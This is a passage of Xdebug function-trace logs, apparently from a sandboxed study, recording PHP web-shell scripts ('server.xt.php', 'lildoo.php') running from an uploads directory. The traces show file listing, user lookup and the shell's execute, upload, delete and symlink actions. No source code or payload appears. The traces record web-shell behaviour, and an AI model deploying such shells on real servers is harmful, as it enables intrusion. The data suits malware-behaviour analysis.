4	465	R			6
4	466	0	0.022013	803136	html	1		/var/www/html/uploads/server.xt.php	1387	1	'/var/www/html/uploads/'
5	467	0	0.022027	803136	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	467	1	0.022042	803408
5	467	R			'/var/www/html/uploads/'
4	466	1	0.022058	803296
4	466	R			'/var/www/html/uploads/'
3		A						/var/www/html/uploads/server.xt.php	1390	$actions = []
4	468	0	0.022092	802376	dirname	0		/var/www/html/uploads/server.xt.php	1391	1	'/var/www/html/uploads/server.xt.php'
4	468	1	0.022105	802472
4	468	R			'/var/www/html/uploads'
4	469	0	0.022119	802440	is_writable	0		/var/www/html/uploads/server.xt.php	1391	1	'/var/www/html/uploads'
4	469	1	0.022136	802480
4	469	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1392	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1393	$actions[] = 'move'
3		A						/var/www/html/uploads/server.xt.php	1395	$actions[] = 'copy'
4	470	0	0.022182	802752	str_repeat	0		/var/www/html/uploads/server.xt.php	1398	2	'&nbsp;'	30
4	470	1	0.022196	803040
4	470	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	471	0	0.022212	802808	word	1		/var/www/html/uploads/server.xt.php	1402	1	'delete'
5	472	0	0.022225	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	472	1	0.022239	803080
5	472	R			'delete'
4	471	1	0.022253	802968
4	471	R			'delete'
4	473	0	0.022267	802800	word	1		/var/www/html/uploads/server.xt.php	1402	1	'move'
5	474	0	0.022280	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	474	1	0.022294	803072
5	474	R			'move'
4	473	1	0.022308	802960
4	473	R			'move'
4	475	0	0.022321	802800	word	1		/var/www/html/uploads/server.xt.php	1402	1	'copy'
5	476	0	0.022334	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'copy'	2	'UTF-8'
5	476	1	0.022348	803072
5	476	R			'copy'
4	475	1	0.022361	802960
4	475	R			'copy'
3	203	1	0.022375	802216
3	477	0	0.022384	802216	html_footer	1		/var/www/html/uploads/server.xt.php	1225	0
3	477	1	0.022397	802216
2	50	1	0.022406	792880
1	3	1	0.022420	792880
			0.022489	575664
TRACE END   [2023-02-12 23:52:22.982466]

data/traces/720d527f359bd8515f5cf46648ebfab4_trace-1676257694.7281.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:08:40.625925]
1	0	1	0.000174	393528
1	3	0	0.002062	789672	{main}	1		/var/www/html/uploads/lildoo.php	0	0
1		A						/var/www/html/uploads/lildoo.php	131	$lang = 'auto'
1		A						/var/www/html/uploads/lildoo.php	136	$homedir = './'
1		A						/var/www/html/uploads/lildoo.php	140	$editcols = 80
1		A						/var/www/html/uploads/lildoo.php	141	$editrows = 25
1		A						/var/www/html/uploads/lildoo.php	159	$htaccess = '.htaccess'
1		A						/var/www/html/uploads/lildoo.php	160	$htpasswd = '.htpasswd'
2	4	0	0.002171	789672	get_magic_quotes_gpc	0		/var/www/html/uploads/lildoo.php	164	0
2	4	1	0.002192	789672
2	4	R			FALSE
2	5	0	0.002219	789672	array_key_exists	0		/var/www/html/uploads/lildoo.php	170	2	'image'	[]
2	5	1	0.002243	789736
2	5	R			FALSE
2	6	0	0.002267	789672	function_exists	0		/var/www/html/uploads/lildoo.php	175	1	'lstat'
2	6	1	0.002291	789712
2	6	R			TRUE
1		A						/var/www/html/uploads/lildoo.php	181	$delim = '/'
2	7	0	0.002332	789672	function_exists	0		/var/www/html/uploads/lildoo.php	183	1	'php_uname'
2	7	1	0.002354	789712
2	7	R			TRUE
2	8	0	0.002378	789672	substr	0		/var/www/html/uploads/lildoo.php	184	3	'Linux'	0	3
2	8	1	0.002401	789800
2	8	R			'Lin'
2	9	0	0.002424	789704	strtoupper	0		/var/www/html/uploads/lildoo.php	184	1	'Lin'
2	9	1	0.002445	789768
2	9	R			'LIN'
1		A						/var/www/html/uploads/lildoo.php	184	$win = FALSE
2	10	0	0.002489	789672	dirname	0		/var/www/html/uploads/lildoo.php	192	1	'/var/www/html/uploads/lildoo.php'
2	10	1	0.002509	789768
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/lildoo.php	192	$scriptdir = '/var/www/html/uploads'
2	11	0	0.002555	789736	relative2absolute	1		/var/www/html/uploads/lildoo.php	198	2	'./'	'/var/www/html/uploads'
3	12	0	0.002578	789736	path_is_relative	1		/var/www/html/uploads/lildoo.php	1080	1	'./'
4	13	0	0.002601	789760	substr	0		/var/www/html/uploads/lildoo.php	1094	3	'./'	0	1
4	13	1	0.002623	789856
4	13	R			'.'
3	12	1	0.002649	789760
3	12	R			TRUE
3	14	0	0.002673	789760	addslash	1		/var/www/html/uploads/lildoo.php	1081	1	'/var/www/html/uploads'
4	15	0	0.002695	789784	substr	0		/var/www/html/uploads/lildoo.php	1070	3	'/var/www/html/uploads'	-1	1
4	15	1	0.002713	789880
4	15	R			's'
3	14	1	0.002731	789832
3	14	R			'/var/www/html/uploads/'
3	16	0	0.002750	789840	simplify_path	1		/var/www/html/uploads/lildoo.php	1081	1	'/var/www/html/uploads/./'
4	17	0	0.002767	789840	file_exists	0		/var/www/html/uploads/lildoo.php	1121	1	'/var/www/html/uploads/./'
4	17	1	0.002792	789880
4	17	R			TRUE
4	18	0	0.002811	789840	function_exists	0		/var/www/html/uploads/lildoo.php	1121	1	'realpath'
4	18	1	0.002829	789880
4	18	R			TRUE
4	19	0	0.002845	789840	realpath	0		/var/www/html/uploads/lildoo.php	1121	1	'/var/www/html/uploads/./'
4	19	1	0.002862	789920
4	19	R			'/var/www/html/uploads'
4	20	0	0.002881	789840	realpath	0		/var/www/html/uploads/lildoo.php	1122	1	'/var/www/html/uploads/./'
4	20	1	0.002898	789920
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/lildoo.php	1122	$path = '/var/www/html/uploads'
4	21	0	0.002930	789888	is_dir	0		/var/www/html/uploads/lildoo.php	1123	1	'/var/www/html/uploads'
4	21	1	0.002959	789952
4	21	R			TRUE
4	22	0	0.002977	789912	addslash	1		/var/www/html/uploads/lildoo.php	1124	1	'/var/www/html/uploads'
5	23	0	0.002993	789912	substr	0		/var/www/html/uploads/lildoo.php	1070	3	'/var/www/html/uploads'	-1	1
5	23	1	0.003010	790008
5	23	R			's'
4	22	1	0.003029	789960
4	22	R			'/var/www/html/uploads/'
3	16	1	0.003050	789912
3	16	R			'/var/www/html/uploads/'
2	11	1	0.003070	789856
2	11	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/lildoo.php	198	$homedir = '/var/www/html/uploads/'
2	24	0	0.003104	789856	array_key_exists	0		/var/www/html/uploads/lildoo.php	200	2	'dir'	[]
2	24	1	0.003123	789920
2	24	R			FALSE
1		A						/var/www/html/uploads/lildoo.php	200	$dir = '/var/www/html/uploads/'
2	25	0	0.003154	789856	array_key_exists	0		/var/www/html/uploads/lildoo.php	202	2	'olddir'	[]
2	25	1	0.003171	789920
2	25	R			FALSE
2	26	0	0.003189	789856	addslash	1		/var/www/html/uploads/lildoo.php	206	1	'/var/www/html/uploads/'
3	27	0	0.003214	789856	substr	0		/var/www/html/uploads/lildoo.php	1070	3	'/var/www/html/uploads/'	-1	1
3	27	1	0.003233	789952
3	27	R			'/'
2	26	1	0.003251	789856
2	26	R			'/var/www/html/uploads/'
2	28	0	0.003282	789856	simplify_path	1		/var/www/html/uploads/lildoo.php	206	1	'/var/www/html/uploads/'
3	29	0	0.003302	789856	file_exists	0		/var/www/html/uploads/lildoo.php	1121	1	'/var/www/html/uploads/'
3	29	1	0.003326	789896
3	29	R			TRUE
3	30	0	0.003344	789856	function_exists	0		/var/www/html/uploads/lildoo.php	1121	1	'realpath'
3	30	1	0.003363	789896
3	30	R			TRUE
3	31	0	0.003380	789856	realpath	0		/var/www/html/uploads/lildoo.php	1121	1	'/var/www/html/uploads/'
3	31	1	0.003397	789936
3	31	R			'/var/www/html/uploads'
3	32	0	0.003416	789856	realpath	0		/var/www/html/uploads/lildoo.php	1122	1	'/var/www/html/uploads/'
3	32	1	0.003433	789936
3	32	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/lildoo.php	1122	$path = '/var/www/html/uploads'
3	33	0	0.003465	789904	is_dir	0		/var/www/html/uploads/lildoo.php	1123	1	'/var/www/html/uploads'
3	33	1	0.003482	789944
3	33	R			TRUE
3	34	0	0.003499	789904	addslash	1		/var/www/html/uploads/lildoo.php	1124	1	'/var/www/html/uploads'
4	35	0	0.003515	789904	substr	0		/var/www/html/uploads/lildoo.php	1070	3	'/var/www/html/uploads'	-1	1
4	35	1	0.003533	790000
4	35	R			's'
3	34	1	0.003550	789952
3	34	R			'/var/www/html/uploads/'
2	28	1	0.003569	789904
2	28	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/lildoo.php	206	$directory = '/var/www/html/uploads/'
1		A						/var/www/html/uploads/lildoo.php	208	$files = []
1		A						/var/www/html/uploads/lildoo.php	209	$action = ''
2	36	0	0.003629	789904	array_key_exists	0		/var/www/html/uploads/lildoo.php	223	2	'num'	[]
2	36	1	0.003647	789968
2	36	R			FALSE
2	37	0	0.003665	789904	array_key_exists	0		/var/www/html/uploads/lildoo.php	232	2	'focus'	[]
2	37	1	0.003683	789968
2	37	R			FALSE
2	38	0	0.003700	789904	sizeof	0		/var/www/html/uploads/lildoo.php	242	1	[]
2	38	1	0.003717	789936
2	38	R			0
1		A						/var/www/html/uploads/lildoo.php	242	$action = ''
2	39	0	0.003746	789904	array_key_exists	0		/var/www/html/uploads/lildoo.php	245	2	'HTTP_ACCEPT_LANGUAGE'	['HTTP_HOST' => 'localhost', 'HTTP_USER_AGENT' => 'python-requests/2.25.1', 'HTTP_ACCEPT_ENCODING' => 'gzip, deflate', 'HTTP_ACCEPT' => '*/*', 'HTTP_CONNECTION' => 'keep-alive', 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin', 'SERVER_SIGNATURE' => '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n', 'SERVER_SOFTWARE' => 'Apache/2.4.52 (Ubuntu)', 'SERVER_NAME' => 'localhost', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'REMOTE_ADDR' => '127.0.0.1', 'DOCUMENT_ROOT' => '/var/www/html', 'REQUEST_SCHEME' => 'http', 'CONTEXT_PREFIX' => '', 'CONTEXT_DOCUMENT_ROOT' => '/var/www/html', 'SERVER_ADMIN' => 'webmaster@localhost', 'SCRIPT_FILENAME' => '/var/www/html/uploads/lildoo.php', 'REMOTE_PORT' => '47298', 'GATEWAY_INTERFACE' => 'CGI/1.1', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'REQUEST_METHOD' => 'GET', 'QUERY_STRING' => '', 'REQUEST_URI' => '/uploads/lildoo.php', 'SCRIPT_NAME' => '/uploads/lildoo.php', 'PHP_SELF' => '/uploads/lildoo.php', 'REQUEST_TIME_FLOAT' => 1676257694.727, 'REQUEST_TIME' => 1676257694]
2	39	1	0.003816	789968
2	39	R			FALSE
1		A						/var/www/html/uploads/lildoo.php	248	$lang = 'en'
2	40	0	0.003847	789904	getwords	1		/var/www/html/uploads/lildoo.php	252	1	'en'
2		A						/var/www/html/uploads/lildoo.php	1620	$word_charset = 'UTF-8'
2		A						/var/www/html/uploads/lildoo.php	2472	$date_format = 'n/j/y H:i:s'
2	40	1	0.003893	789952
2	40	R			['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/lildoo.php	252	$words = ['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/lildoo.php	258	$cols = 7
2	41	0	0.004155	789952	function_exists	0		/var/www/html/uploads/lildoo.php	261	1	'umask'
2	41	1	0.004174	789992
2	41	R			TRUE
2	42	0	0.004191	789952	umask	0		/var/www/html/uploads/lildoo.php	261	0
2	42	1	0.004208	789952
2	42	R			18
1		A						/var/www/html/uploads/lildoo.php	261	$dirpermission = 493
2	43	0	0.004239	789952	function_exists	0		/var/www/html/uploads/lildoo.php	264	1	'umask'
2	43	1	0.004256	789992
2	43	R			TRUE
2	44	0	0.004273	789952	umask	0		/var/www/html/uploads/lildoo.php	264	0
2	44	1	0.004289	789952
2	44	R			18
1		A						/var/www/html/uploads/lildoo.php	264	$filepermission = 420
2	45	0	0.004320	789952	basename	0		/var/www/html/uploads/lildoo.php	268	1	'/uploads/lildoo.php'
2	45	1	0.004339	790024
2	45	R			'lildoo.php'
2	46	0	0.004357	789992	html	1		/var/www/html/uploads/lildoo.php	268	1	'lildoo.php'
3	47	0	0.004374	790016	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'lildoo.php'	2	NULL
3	47	1	0.004395	790288
3	47	R			'lildoo.php'
2	46	1	0.004412	790176
2	46	R			'lildoo.php'
1		A						/var/www/html/uploads/lildoo.php	268	$self = 'lildoo.php'
2	48	0	0.004444	790136	substr	0		/var/www/html/uploads/lildoo.php	276	3	'Apache/2.4.52 (Ubuntu)'	0	6
2	48	1	0.004462	790264
2	48	R			'Apache'
2	49	0	0.004480	790168	strtolower	0		/var/www/html/uploads/lildoo.php	276	1	'Apache'
2	49	1	0.004496	790232
2	49	R			'apache'
1		A						/var/www/html/uploads/lildoo.php	277	$apache = TRUE
2	50	0	0.004529	790136	listing_page	1		/var/www/html/uploads/lildoo.php	842	1	???
3	51	0	0.004546	790232	html_header	1		/var/www/html/uploads/lildoo.php	1184	0
3	51	1	0.004565	790232
3	52	0	0.004574	790232	getlist	1		/var/www/html/uploads/lildoo.php	1186	1	'/var/www/html/uploads/'
4	53	0	0.004592	790232	opendir	0		/var/www/html/uploads/lildoo.php	851	1	'/var/www/html/uploads/'
4	53	1	0.004618	790624
4	53	R			resource(4) of type (stream)
3		A						/var/www/html/uploads/lildoo.php	851	$d = resource(4) of type (stream)
4	54	0	0.004653	790592	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	54	1	0.004681	790664
4	54	R			'..'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = '..'
3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/..'
4	55	0	0.004725	790680	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/..'
4	55	1	0.004747	792504
4	55	R			[0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 8]
4	56	0	0.004827	793160	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/..'
4	56	1	0.004846	793208
4	56	R			FALSE
4	57	0	0.004864	793168	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/..'
4	57	1	0.004880	793208
4	57	R			TRUE
4	58	0	0.004897	793168	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/..'
4	58	1	0.004914	793208
4	58	R			FALSE
4	59	0	0.004931	793168	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/..'
4	59	1	0.004951	793208
4	59	R			TRUE
4	60	0	0.004969	793168	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/..'
4	60	1	0.004988	793208
4	60	R			TRUE
4	61	0	0.005006	793168	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/..'
4	61	1	0.005022	793208
4	61	R			1676257694
4	62	0	0.005039	793168	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/..'
4	62	1	0.005061	793208
4	62	R			1676257694
4	63	0	0.005079	793168	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/..'
4	63	1	0.005095	793208
4	63	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	64	0	0.005146	793224	file_exists	0		/var/www/html/uploads/lildoo.php	877	1	'/var/www/html/uploads/../.'
4	64	1	0.005167	793264
4	64	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	877	$file['is_executable'] = TRUE
4	65	0	0.005200	793168	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	65	1	0.005219	793208
4	65	R			TRUE
4	66	0	0.005235	793168	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	0
4	66	1	0.005273	793968
4	66	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	67	0	0.005304	793936	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	67	1	0.005330	794344
4	67	R			'root'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'root'
4	68	0	0.005363	793200	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	68	1	0.005381	793240
4	68	R			TRUE
4	69	0	0.005398	793200	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	0
4	69	1	0.005428	793856
4	69	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	70	0	0.005453	793824	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	70	1	0.005475	794232
4	70	R			'root'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	71	0	0.005544	794248	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	71	1	0.005562	794328
4	71	R			'lildoo.php'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = 'lildoo.php'
3		A						/var/www/html/uploads/lildoo.php	855	$path = '/var/www/html/uploads/lildoo.php'
4	72	0	0.005609	794352	lstat	0		/var/www/html/uploads/lildoo.php	857	1	'/var/www/html/uploads/lildoo.php'
4	72	1	0.005630	796152
4	72	R			[0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 152]
3		A						/var/www/html/uploads/lildoo.php	857	$stat = [0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676257694, 9 => 1676257694, 10 => 1676257694, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676257694, 'mtime' => 1676257694, 'ctime' => 1676257694, 'blksize' => 4096, 'blocks' => 152]
4	73	0	0.005710	795056	is_file	0		/var/www/html/uploads/lildoo.php	862	1	'/var/www/html/uploads/lildoo.php'
4	73	1	0.005730	795104
4	73	R			TRUE
4	74	0	0.005747	795064	is_dir	0		/var/www/html/uploads/lildoo.php	863	1	'/var/www/html/uploads/lildoo.php'
4	74	1	0.005764	795104
4	74	R			FALSE
4	75	0	0.005781	795064	is_link	0		/var/www/html/uploads/lildoo.php	864	1	'/var/www/html/uploads/lildoo.php'
4	75	1	0.005797	795104
4	75	R			FALSE
4	76	0	0.005814	795064	is_readable	0		/var/www/html/uploads/lildoo.php	865	1	'/var/www/html/uploads/lildoo.php'
4	76	1	0.005834	795104
4	76	R			TRUE
4	77	0	0.005851	795064	is_writable	0		/var/www/html/uploads/lildoo.php	866	1	'/var/www/html/uploads/lildoo.php'
4	77	1	0.005870	795104
4	77	R			FALSE
4	78	0	0.005910	795064	filemtime	0		/var/www/html/uploads/lildoo.php	871	1	'/var/www/html/uploads/lildoo.php'
4	78	1	0.005928	795104
4	78	R			1676257694
4	79	0	0.006016	795064	fileatime	0		/var/www/html/uploads/lildoo.php	872	1	'/var/www/html/uploads/lildoo.php'
4	79	1	0.006035	795104
4	79	R			1676257694
4	80	0	0.006052	795064	filectime	0		/var/www/html/uploads/lildoo.php	873	1	'/var/www/html/uploads/lildoo.php'
4	80	1	0.006068	795104
4	80	R			1676257694
3		A						/var/www/html/uploads/lildoo.php	873	$file = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694]
4	81	0	0.006128	795064	is_executable	0		/var/www/html/uploads/lildoo.php	880	1	'/var/www/html/uploads/lildoo.php'
4	81	1	0.006151	795104
4	81	R			FALSE
3		A						/var/www/html/uploads/lildoo.php	880	$file['is_executable'] = FALSE
4	82	0	0.006185	795064	function_exists	0		/var/www/html/uploads/lildoo.php	888	1	'posix_getpwuid'
4	82	1	0.006203	795104
4	82	R			TRUE
4	83	0	0.006220	795064	posix_getpwuid	0		/var/www/html/uploads/lildoo.php	888	1	1000
4	83	1	0.006264	795880
4	83	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	84	0	0.006296	795848	reset	0		/var/www/html/uploads/lildoo.php	888	1	['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	84	1	0.006322	796256
4	84	R			'osboxes'
3		A						/var/www/html/uploads/lildoo.php	888	$file['owner_name'] = 'osboxes'
4	85	0	0.006356	795096	function_exists	0		/var/www/html/uploads/lildoo.php	889	1	'posix_getgrgid'
4	85	1	0.006374	795136
4	85	R			TRUE
4	86	0	0.006392	795096	posix_getgrgid	0		/var/www/html/uploads/lildoo.php	889	1	1000
4	86	1	0.006433	795752
4	86	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	87	0	0.006459	795720	reset	0		/var/www/html/uploads/lildoo.php	889	1	['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	87	1	0.006481	796128
4	87	R			'osboxes'
3		A						/var/www/html/uploads/lildoo.php	889	$file['group_name'] = 'osboxes'
3		A						/var/www/html/uploads/lildoo.php	891	$files[] = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	88	0	0.006551	795768	readdir	0		/var/www/html/uploads/lildoo.php	853	1	resource(4) of type (stream)
4	88	1	0.006570	795840
4	88	R			'.'
3		A						/var/www/html/uploads/lildoo.php	853	$filename = '.'
